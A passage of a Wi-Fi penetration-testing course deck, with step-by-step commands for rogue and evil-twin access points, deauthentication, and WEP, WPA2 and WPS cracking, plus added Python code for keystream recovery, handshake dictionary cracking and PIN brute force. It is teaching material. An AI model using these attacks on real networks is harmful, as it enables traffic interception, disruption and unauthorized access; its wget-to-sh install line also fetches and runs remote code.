• Managed - Station (client) mode: the card joins a network provided by an access point and lets that AP manage the connection. This is the normal mode of a laptop connecting to Wi-Fi.
• Ad-hoc - Ad-hoc mode refers to a wireless network structure where devices communicate directly with each other without an AP. This type of wireless network is also called peer-to-peer mode.
• Master - When your wireless card is in master mode it acts as an access point: it actively transmits beacons and serves clients. This is the mode airbase-ng and wifipumpkin3 put the adapter into on the rogue AP slides.
• Monitor - Monitor mode, or RFMON (Radio Frequency MONitor) mode, allows a computer with a wireless network interface controller (WNIC) to observe all traffic received on a wireless channel, including frames not addressed to it, without associating to any AP. airodump-ng, aireplay-ng and Bettercap's wifi.recon rely on it.
• Auto - The easiest way to configure a wireless interface; enabled by default, the driver picks managed or ad-hoc as appropriate.
19. TP-Link TL-WN722N Driver Software installation
• Only v2/v3 of the TL-WN722N, which use the Realtek RTL8188EUS chipset, need this out-of-tree driver; v1 uses the Atheros AR9271 and works with the in-kernel ath9k_htc driver.
• sudo apt update
• sudo apt upgrade
• sudo apt dist-upgrade
• sudo reboot
• sudo apt install bc
• sudo apt-get install build-essential
• sudo apt-get install libelf-dev
• sudo apt install linux-headers-amd64
• echo "blacklist r8188eu" | sudo tee /etc/modprobe.d/realtek.conf   [stops the in-kernel r8188eu driver from claiming the adapter; writing the file needs root, which a plain shell redirect does not give you]
• sudo reboot
• git clone https://github.com/aircrack-ng/rtl8188eus
• cd rtl8188eus
• sh -c "$(wget -O- https://gitlab.com/KanuX/rtl8188eus/-/raw/master/scripts/build.sh)"   [this pipes a remote script into sh: download and read it first]
20. Monitor Mode
• Start the Kali OS in VMware or VirtualBox
• Plug in the USB TP-Link wireless adapter (TL-WN722N) and pass the USB device through to the VM
• Run the following command: iwconfig   [the adapter should appear as wlan0 with Mode:Managed]
21. Monitor Mode (Contd.)
• By default the adapter is in Auto or Managed mode
• Run the following commands to switch to Monitor mode:
• airmon-ng check kill   [kills NetworkManager/wpa_supplicant, which otherwise keep resetting the interface; run it before starting monitor mode]
• airmon-ng start wlan0
• iwconfig   [confirm Mode:Monitor; recent airmon-ng versions rename the interface to wlan0mon, so substitute the name iwconfig shows wherever the following slides say wlan0]
• To disable monitor mode run: airmon-ng stop wlan0mon (or wlan0 if it was not renamed)
• Restart the network manager: service network-manager start (on current Kali: systemctl start NetworkManager)
23. Wireless Packets - IEEE 802.11 MAC Frame Structure
(frame structure diagram shown as an image in the deck)
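Since the frame-structure diagram itself is an image, here is the same structure as an added example in Python (not code from the deck): it parses the 24-byte 802.11 MAC header, resolves the three address fields to source, destination and BSSID according to the ToDS/FromDS flags, and pulls SSID, channel, privacy bit and RSN element out of a beacon body, which is the information airodump-ng and Bettercap's wifi.show tabulate on the reconnaissance slides. The beacon bytes are constructed by build_beacon, not captured; the tag numbers and capability bit are the standard 802.11 values.

```python
import struct

# 802.11 constants (standard values, hard-coded here so the demo is self-contained)
TYPE_MGMT, TYPE_DATA = 0, 2
SUBTYPE_BEACON = 8
TAG_SSID, TAG_DS_PARAM, TAG_RSN = 0, 3, 48   # SSID, channel (DS Parameter Set), RSN (WPA2) IEs
CAP_PRIVACY = 0x0010                        # capability bit: some form of encryption is required


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def parse_80211(frame):
    """Parse the 24-byte MAC header; for beacons also parse the body.
    Which address is the BSSID depends on the ToDS/FromDS flags in Frame Control."""
    fc = struct.unpack_from("<H", frame, 0)[0]
    ftype, subtype = (fc >> 2) & 0x3, (fc >> 4) & 0xF
    to_ds, from_ds = bool(fc & 0x0100), bool(fc & 0x0200)
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    if not to_ds and not from_ds:      # management frames and ad-hoc data: addr3 is the BSSID
        roles = {"dst": a1, "src": a2, "bssid": a3}
    elif to_ds and not from_ds:        # station -> AP: addr1 is the BSSID
        roles = {"bssid": a1, "src": a2, "dst": a3}
    elif from_ds and not to_ds:        # AP -> station: addr2 is the BSSID
        roles = {"dst": a1, "bssid": a2, "src": a3}
    else:                              # WDS/mesh: four addresses, no single BSSID
        roles = {"ra": a1, "ta": a2, "dst": a3}
    info = {"type": ftype, "subtype": subtype, **{k: mac_str(v) for k, v in roles.items()}}
    if ftype == TYPE_MGMT and subtype == SUBTYPE_BEACON:
        info.update(parse_beacon_body(frame[24:]))
    return info


def parse_beacon_body(body):
    """Fixed fields (timestamp, beacon interval, capabilities) then tagged parameters."""
    _timestamp, interval, cap = struct.unpack_from("<QHH", body, 0)
    info = {"beacon_interval_tu": interval, "privacy": bool(cap & CAP_PRIVACY),
            "ssid": None, "channel": None, "rsn": False}
    off = 12
    while off + 2 <= len(body):
        tag, length = body[off], body[off + 1]
        value = body[off + 2:off + 2 + length]
        if len(value) < length:        # truncated IE: stop rather than read past the frame
            break
        if tag == TAG_SSID:
            info["ssid"] = value.decode("utf-8", "replace")   # "" means a hidden SSID
        elif tag == TAG_DS_PARAM and length == 1:
            info["channel"] = value[0]
        elif tag == TAG_RSN:
            info["rsn"] = True
        off += 2 + length
    return info


def classify(info):
    """The ENC column airodump-ng would show for this beacon (WPA1-only IEs are not modelled)."""
    if info["rsn"]:
        return "WPA2"
    return "WEP" if info["privacy"] else "OPN"


def build_beacon(bssid, ssid, channel, rsn=True):
    """Construct a minimal beacon frame (demo input, not a real capture)."""
    header = struct.pack("<HH", 0x0080, 0) + b"\xff" * 6 + bssid + bssid + struct.pack("<H", 0)
    cap = 0x0001 | (CAP_PRIVACY if rsn else 0)           # ESS bit, plus privacy when encrypted
    body = struct.pack("<QHH", 0, 100, cap)
    body += bytes([TAG_SSID, len(ssid)]) + ssid.encode()
    body += bytes([TAG_DS_PARAM, 1, channel])
    if rsn:   # RSN IE: version 1, group CCMP, one pairwise CCMP, one AKM PSK, capabilities 0
        rsn_ie = (struct.pack("<H", 1) + b"\x00\x0f\xac\x04" + struct.pack("<H", 1) +
                  b"\x00\x0f\xac\x04" + struct.pack("<H", 1) + b"\x00\x0f\xac\x02" +
                  struct.pack("<H", 0))
        body += bytes([TAG_RSN, len(rsn_ie)]) + rsn_ie
    return header + body


def survey(frames):
    """airodump-ng-style table: one row per BSSID seen in beacons."""
    seen = {}
    for f in frames:
        p = parse_80211(f)
        if p["type"] == TYPE_MGMT and p["subtype"] == SUBTYPE_BEACON:
            seen[p["bssid"]] = (p["ssid"], p["channel"], classify(p))
    return seen


if __name__ == "__main__":
    demo = [build_beacon(bytes.fromhex("001122334455"), "tplink", 11),
            build_beacon(bytes.fromhex("66778899aabb"), "hello", 6, rsn=False)]
    for bssid, (ssid, ch, enc) in survey(demo).items():
        print(f"{bssid}  ch {ch:>2}  {enc:<5} {ssid}")
```

Feeding real frames (for example the 802.11 layer of a pcap written by airodump-ng -w) into parse_80211 gives the same dictionary; the parser deliberately stops at a truncated information element instead of trusting the length byte, since beacons are attacker-controlled input.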
30. WPA2 Personal and Enterprise
(diagram shown as an image in the deck)
33. Wireless Reconnaissance
• Tools required: Bettercap, airodump-ng and Kismet
• Start Bettercap on the wireless interface: bettercap --iface wlan0
• In the Bettercap prompt run the following commands:
  help wifi
  wifi.recon on
  wifi.show
  wifi.recon off
• wifi.show lists each AP's BSSID, SSID, channel, encryption and the clients seen talking to it; Bettercap hops channels by itself once wifi.recon is on
35. Wardriving with Kismet (Just for reference)
• This is done while moving, driving or walking through multiple locations, capturing Wi-Fi hotspots together with GPS coordinates.
• Hardware required: car, laptop, Android phone, Wi-Fi adapter
• Software required: Kismet, GPSD, ADB, Share GPS (Android app), Google Earth
• Reference blog link: https://veteransec.org/wifi-hacking-wardriving-with-an-android-phone-and-raspberry-pi-3/
38. Rogue Access points requirements
• Tools required: airodump-ng, airbase-ng, airmon-ng and wifipumpkin3
• wifipumpkin3 installation:
  git clone https://github.com/P0cL4bs/wifipumpkin3
  https://wifipumpkin3.github.io/docs/getting-started#installation
• dnsmasq:
  sudo apt-get install dnsmasq -y
39. Creation of Rogue AP using wifipumpkin3
• Plug in the wireless adapter; wifipumpkin3 does not require monitor mode. Run the following commands:
  wifipumpkin3
  set interface wlan0
  set ssid hello
  set proxy noproxy
  start
• This creates a rogue AP with the SSID "hello"
40. Creation of Rogue AP using wifipumpkin3 (Contd.)
• Once any device connects to the rogue AP "hello", the traffic of the connected clients can be intercepted (evil twin attack). Plain HTTP and DNS are readable as-is; HTTPS traffic passes through the attacker's box but stays encrypted unless the client accepts a forged certificate.
41. Creation of Rogue AP using Aircrack-ng tools
• airodump-ng wlan0   [survey first; note the channel and BSSID of the AP to impersonate]
• airbase-ng -c 11 -e tplink -s -W 1 wlan0   [advertise SSID "tplink" on channel 11; -s forces shared-key authentication and -W 1 sets the privacy bit in the beacons]
• airodump-ng -c 11 --bssid <BSSID of the newly created AP> -w 1 wlan0   [confirm the fake AP is up; -w 1 writes the capture to 1-01.cap]
• For an evil twin / MITM attack we need dnsmasq:
• airbase-ng -e TP-Link -c 8 wlan0   [create the fake AP for the evil twin attack]
• airbase-ng creates the at0 tap interface, which carries the clients' traffic. Edit the dnsmasq config (geany /etc/dnsmasq.conf) so it reads:
  interface=at0
  dhcp-range=10.0.0.10,10.0.0.250,12h
  dhcp-option=3,10.0.0.1
  dhcp-option=6,10.0.0.1
  server=8.8.8.8
  log-queries
  log-dhcp
  listen-address=127.0.0.1
  [option 3 is the default gateway and option 6 the DNS server handed to clients; both point at the attacker, which is what makes the DNS queries visible]
42. Creation of Rogue AP using Aircrack-ng tools (Contd.)
Run the commands below in a separate terminal:
• ifconfig at0 up
• ifconfig at0 10.0.0.1 netmask 255.255.255.0
• route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
• iptables -P FORWARD ACCEPT
• iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE   [-o must name the interface with the upstream connection; wlan0 is busy hosting the fake AP, so in practice this is eth0 or a second adapter]
• echo '1' > /proc/sys/net/ipv4/ip_forward
• dnsmasq -C /etc/dnsmasq.conf -d   [-d keeps dnsmasq in the foreground so leases and queries are printed]
• Connect with any device now; its DHCP lease, DNS queries and forwarded traffic are visible on at0
44. Cracking WEP
Create a rogue access point with the WEP cipher (the lab target; the key 31:32:33:34:35 is the 40-bit key "12345" written in hex):
• airbase-ng -c 11 -e hello -w 31:32:33:34:35 wlan0
Use the same dnsmasq config here:
• ifconfig at0 up
• ifconfig at0 10.0.0.1 netmask 255.255.255.0
• route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
• iptables -P FORWARD ACCEPT
• iptables -t nat -A POSTROUTING -o wlan0 -j MASQUERADE
• echo '1' > /proc/sys/net/ipv4/ip_forward
• dnsmasq -C /etc/dnsmasq.conf -d
• Connect a client device to the fake WEP AP
• airodump-ng wlan0   [check whether the fake AP is up; its ENC column should read WEP]
45. Cracking WEP (Contd.)
• Deauthentication attack with aireplay-ng:
• aireplay-ng --deauth 0 -a <MAC of fake AP> -c <MAC of connected client> wlan0   [0 sends deauth frames until stopped; -a is the AP BSSID, -c the client]
• Deauthentication attack with Bettercap:
• bettercap --iface wlan0
• wifi.recon on, then wifi.show
• wifi.deauth <MAC of fake AP>
• Macchanger (randomise the attacking adapter's MAC before the fake-authentication step):
• ifconfig wlan0 down
• macchanger -r wlan0
• ifconfig wlan0 up
46. Cracking WEP (Contd.)
• airodump-ng to dump the capture file:
• airodump-ng -c 11 --bssid <MAC of fake AP> -w wepcrack wlan0   [writes wepcrack-01.cap]
• Fake authentication (associates the attacking adapter so the AP accepts its injected frames):
• aireplay-ng --fakeauth 60 -e hello -a <MAC of fake AP> -h <MAC of wlan0> wlan0
• ARP request replay attack (re-injects captured ARP requests so the AP answers with fresh IVs):
• aireplay-ng --arpreplay -e hello -a <MAC of fake AP> -h <MAC of wlan0> wlan0
• Again perform the deauth attack (forces the client to reconnect and send an ARP request that can be replayed):
• aireplay-ng --deauth 0 -a <MAC of fake AP> -c <MAC of connected client> wlan0
• Stop the deauth once the #Data column in airodump-ng starts climbing
• Crack the WEP capture using aircrack-ng:
• aircrack-ng wepcrack-01.cap   [it will crack the WEP key; it needs tens of thousands of unique IVs and retries automatically as the capture grows]
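Why the steps above work, as an added example in Python (not the deck's code): WEP encrypts each frame with RC4 keyed by the 24-bit cleartext IV concatenated with the shared key, so two frames with the same IV share a keystream, and the fixed LLC/SNAP and ARP header at the front of every ARP request yields 16 bytes of that keystream without knowing the key. The ARP replay step floods the AP into producing fresh IVs, and aircrack-ng's PTW attack turns the collected (IV, keystream) pairs into the key; this block stops at the keystream-recovery and IV-reuse part. The key "12345" (the slide's 31:32:33:34:35), the IV and both frames are constructed for the demo.

```python
import math
import struct
import zlib


def rc4(key, length):
    """Plain RC4 (KSA + PRGA) producing `length` keystream bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for _ in range(length):
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(key, iv, payload):
    """WEP frame body: IV(3) || key id(1) || RC4_{IV||key}(payload || CRC32 ICV)."""
    icv = struct.pack("<I", zlib.crc32(payload) & 0xFFFFFFFF)
    return iv + b"\x00" + xor(payload + icv, rc4(iv + key, len(payload) + 4))


def wep_decrypt(key, body):
    """Returns (payload, icv_ok). A wrong key or a modified frame fails the CRC check."""
    iv, ct = body[:3], body[4:]
    pt = xor(ct, rc4(iv + key, len(ct)))
    payload, icv = pt[:-4], pt[-4:]
    return payload, struct.pack("<I", zlib.crc32(payload) & 0xFFFFFFFF) == icv


# Known plaintext at the start of every WEP-encrypted ARP request on Ethernet/IPv4:
# LLC/SNAP header for EtherType 0x0806, then ARP hw type, proto type, sizes and opcode.
KNOWN_ARP_PREFIX = bytes.fromhex("aaaa030000000806" "0001080006040001")


def keystream_from_arp(body):
    """Known-plaintext attack: ciphertext XOR known plaintext = keystream for this IV."""
    return xor(body[4:4 + len(KNOWN_ARP_PREFIX)], KNOWN_ARP_PREFIX)


def decrypt_reused_iv(arp_body, other_body):
    """Two frames with the same IV share keystream, so the keystream recovered from the
    ARP frame decrypts the first 16 bytes of the other frame without the key."""
    if arp_body[:3] != other_body[:3]:
        raise ValueError("IVs differ: keystreams are independent, attack does not apply")
    ks = keystream_from_arp(arp_body)
    return xor(other_body[4:4 + len(ks)], ks)


def iv_collision_probability(frames, iv_bits=24):
    """Birthday bound: probability that at least two of `frames` frames reuse an IV."""
    return 1 - math.exp(-frames * (frames - 1) / (2 * 2 ** iv_bits))


if __name__ == "__main__":
    key = b"12345"                              # the slide's 40-bit key 31:32:33:34:35
    iv = b"\x3a\x12\x07"                        # constructed IV, reused on purpose below
    arp = KNOWN_ARP_PREFIX + bytes(20)          # 36-byte ARP request (addresses zeroed)
    secret = bytes.fromhex("aaaa030000000800") + b"\x45\x00\x00\x54" + b"\x11" * 24  # an IP packet
    frame_a = wep_encrypt(key, iv, arp)
    frame_b = wep_encrypt(key, iv, secret)
    print(decrypt_reused_iv(frame_a, frame_b).hex())   # first 16 bytes of `secret`
    print(f"P(IV reuse) after 5000 frames: {iv_collision_probability(5000):.2f}")
```

With only 2^24 IVs, a busy network repeats one within hours even without injection; the replay attack just compresses that to minutes, which is why the #Data counter in airodump-ng is the number to watch.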
48. Cracking WEP dump file using aircrack-ng
(screenshot shown as an image in the deck)
54. Capture the WPA/WPA2 Handshake file
• Run the following commands:
• airmon-ng start wlan0   [put the wireless adapter in monitor mode]
• airodump-ng wlan0   [list all the APs that are alive]
• airodump-ng -c 6 --bssid <MAC of the WPA AP> -w wpacracking wlan0   [capture on the AP's channel and write the handshake to wpacracking-01.cap]
• Trigger a handshake: either disconnect and reconnect your mobile device to that AP by hand, or deauthenticate a connected client with aireplay-ng --deauth 1 -a <MAC of the WPA AP> -c <MAC of client> wlan0. airodump-ng prints "WPA handshake: <BSSID>" in its top-right corner once the 4-way handshake is in the capture.
• aircrack-ng wpacracking-01.cap -w /usr/share/dict/wordlist-probable.txt   [pass the wordlist together with the handshake file]
55. Capture the WPA/WPA2 Handshake file (Contd.)
(screenshot shown as an image in the deck)
56. Cracking WPA/WPA2 using John the Ripper
• john --wordlist=/usr/share/dict/wordlist-probable.txt --rules --stdout | aircrack-ng -e tplink -w - wpacracking-01.cap   [john applies its mangling rules and prints the candidates; aircrack-ng reads them from stdin (-w -) and tests each against the handshake of ESSID tplink]
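What aircrack-ng and the john pipeline compute for every candidate, as an added example in Python that is not part of the deck: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds), PTK = PRF-512(PMK, both MAC addresses, both nonces), and the MIC over EAPOL message 2 keyed with the KCK (the first 16 bytes of the PTK); a candidate is correct when its MIC matches the one the client sent. The handshake here is constructed by build_demo_handshake from a chosen passphrase rather than read from wpacracking-01.cap; the MACs, nonces, SSID "tplink" and wordlist are demo values.

```python
import hashlib
import hmac

# Offsets inside an EAPOL-Key frame (4-byte EAPOL header + key descriptor), per 802.11i
KEY_INFO_OFF, MIC_OFF, MIC_LEN = 5, 81, 16


def pmk_from_passphrase(passphrase, ssid):
    """WPA2-Personal: PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 rounds, 32 bytes).
    The 4096 rounds are what makes each dictionary guess expensive."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PRF-512 from 802.11i: expands the PMK with both MACs and both nonces.
    Only the first 16 bytes (KCK) are needed to check a handshake MIC."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    out = b""
    for i in range(4):
        out += hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[:64]


def eapol_mic(kck, eapol, key_version):
    """MIC over the whole EAPOL frame with the MIC field zeroed.
    key_version 1 = HMAC-MD5 (WPA/TKIP), 2 = HMAC-SHA1 truncated to 16 bytes (WPA2/CCMP)."""
    zeroed = eapol[:MIC_OFF] + bytes(MIC_LEN) + eapol[MIC_OFF + MIC_LEN:]
    if key_version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    if key_version == 2:
        return hmac.new(kck, zeroed, hashlib.sha1).digest()[:MIC_LEN]
    raise ValueError("key descriptor version %d (AES-CMAC, 802.11w) not handled here" % key_version)


def crack_handshake(hs, wordlist):
    """Per candidate: PMK -> PTK -> MIC, then compare with the captured MIC."""
    eapol = hs["eapol2"]
    key_version = eapol[KEY_INFO_OFF + 1] & 0x07      # low 3 bits of the Key Information field
    captured_mic = eapol[MIC_OFF:MIC_OFF + MIC_LEN]
    for candidate in wordlist:
        if not 8 <= len(candidate) <= 63:             # WPA passphrase length rule: skip early
            continue
        pmk = pmk_from_passphrase(candidate, hs["ssid"])
        kck = ptk_from_pmk(pmk, hs["ap_mac"], hs["sta_mac"], hs["anonce"], hs["snonce"])[:16]
        if hmac.compare_digest(eapol_mic(kck, eapol, key_version), captured_mic):
            return candidate
    return None


def build_demo_handshake(passphrase, ssid="tplink", key_version=2):
    """Constructed handshake for the demo: message 2 of the 4-way handshake with a MIC
    computed from `passphrase`, as a client would send it. Not a real capture."""
    ap_mac, sta_mac = bytes.fromhex("001122334455"), bytes.fromhex("aabbccddeeff")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    key_info = 0x0100 | 0x0008 | key_version          # MIC present, pairwise, descriptor version
    body = (bytes([2]) + key_info.to_bytes(2, "big") + (16).to_bytes(2, "big") +
            (1).to_bytes(8, "big") + snonce + bytes(16) + bytes(8) + bytes(8) +
            bytes(MIC_LEN) + (0).to_bytes(2, "big"))
    eapol = bytes([1, 3]) + len(body).to_bytes(2, "big") + body   # EAPOL v1, type 3 = EAPOL-Key
    kck = ptk_from_pmk(pmk_from_passphrase(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    mic = eapol_mic(kck, eapol, key_version)
    eapol = eapol[:MIC_OFF] + mic + eapol[MIC_OFF + MIC_LEN:]
    return {"ssid": ssid, "ap_mac": ap_mac, "sta_mac": sta_mac,
            "anonce": anonce, "snonce": snonce, "eapol2": eapol}


if __name__ == "__main__":
    hs = build_demo_handshake("tplink123")            # constructed target passphrase
    print(crack_handshake(hs, ["password", "12345678", "qwerty", "tplink123"]))
```

Everything the attacker needs (SSID, both MACs, both nonces, message 2 with its MIC) is in the clear in the capture, which is why a single handshake is enough; the only defence on the passphrase side is making the PBKDF2 search infeasible with a long random passphrase.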
57. Cracking WPA/WPA2 using Wifite
• wifite --wpa
• Before starting the attack, connect a client device to the target AP (Wifite deauthenticates it to force a handshake it can capture)
59. Cracking WPS (PIN attacks)
• wifite --wps   [using Wifite]
• reaver -i wlan0mon -b <bssid> -vv -L -N -c 1 -K   [using Reaver: -L ignore the locked state the AP reports, -N do not send NACKs on out-of-order packets, -c 1 the AP's channel, -K run the offline Pixie Dust attack, -vv verbose; wlan0mon is the monitor-mode interface name airmon-ng assigns]
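Why an 8-digit PIN can be brute-forced over the air at all, as an added example in Python (not reaver's code): the eighth digit is a checksum of the first seven, and the WPS registrar confirms the first four and the last four digits in separate protocol steps (M4/M5 and M6/M7), so the search is at most 10^4 + 10^3 = 11,000 attempts instead of 10^7. The registrar is simulated here without rate limiting or lock-out, the situation reaver's -L option assumes; the Pixie Dust attack (-K) is a separate offline attack on weak registrar nonces and is not modelled.

```python
def wps_checksum(first7):
    """Checksum digit over the first seven PIN digits (the WPS specification's algorithm)."""
    accum = 0
    n = first7
    while n:
        accum += 3 * (n % 10)
        n //= 10
        accum += n % 10
        n //= 10
    return (10 - accum % 10) % 10


def is_valid_pin(pin):
    return len(pin) == 8 and pin.isdigit() and int(pin[7]) == wps_checksum(int(pin[:7]))


class SimulatedRegistrar:
    """Stand-in for the AP's WPS registrar. In the real protocol the first half is
    confirmed at M4/M5 and the second half at M6/M7, so each half leaks separately.
    This model never locks, i.e. behaves like an AP that reaver is run against with -L."""

    def __init__(self, pin):
        if not is_valid_pin(pin):
            raise ValueError("AP PIN must itself carry a valid checksum")
        self._pin = pin
        self.attempts = 0

    def try_first_half(self, half):      # M4 -> M5 only succeeds if the first 4 digits match
        self.attempts += 1
        return half == self._pin[:4]

    def try_second_half(self, pin):      # M6 -> M7 only succeeds if the full PIN matches
        self.attempts += 1
        return pin == self._pin


def brute_force_pin(ap):
    """reaver's search order: 10^4 first halves, then 10^3 second halves with the eighth
    digit recomputed as the checksum; 11,000 attempts worst case instead of 10^7."""
    first = None
    for i in range(10_000):
        if ap.try_first_half(f"{i:04d}"):
            first = f"{i:04d}"
            break
    if first is None:
        return None
    for j in range(1_000):
        seven = first + f"{j:03d}"
        pin = seven + str(wps_checksum(int(seven)))
        if ap.try_second_half(pin):
            return pin
    return None


def worst_case_attempts():
    return 10_000 + 1_000


if __name__ == "__main__":
    ap = SimulatedRegistrar("12345670")   # the well-known default WPS PIN, used here as the target
    print(brute_force_pin(ap), "after", ap.attempts, "attempts of", worst_case_attempts())
```

Real APs slow this down by locking WPS after a few failures, which is the state -L tells reaver to ignore; the only robust fix is the one on the best-practices slide, disabling WPS entirely.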
60. Next-Gen Wireless Assessment tools
• Wi-Fi Pineapple
61. Security Best Practices
• Change default passwords
• Restrict access to authorized users
• Encrypt the data on your network (WPA2 or WPA3 with a long, random passphrase; never WEP, which the preceding slides crack in minutes, and disable WPS so the PIN attack cannot bypass the passphrase)
• Protect your Service Set Identifier (SSID)
• Install a firewall
• Maintain antivirus software
• Use file sharing with caution
• Keep your access point software patched and up to date
• Check your internet provider's or router manufacturer's wireless security options
• Connect using a Virtual Private Network (VPN), especially on networks you do not control, since an evil twin can see everything that is not end-to-end encrypted
• Reference blog link: https://www.cisa.gov/uscert/ncas/tips/ST05-003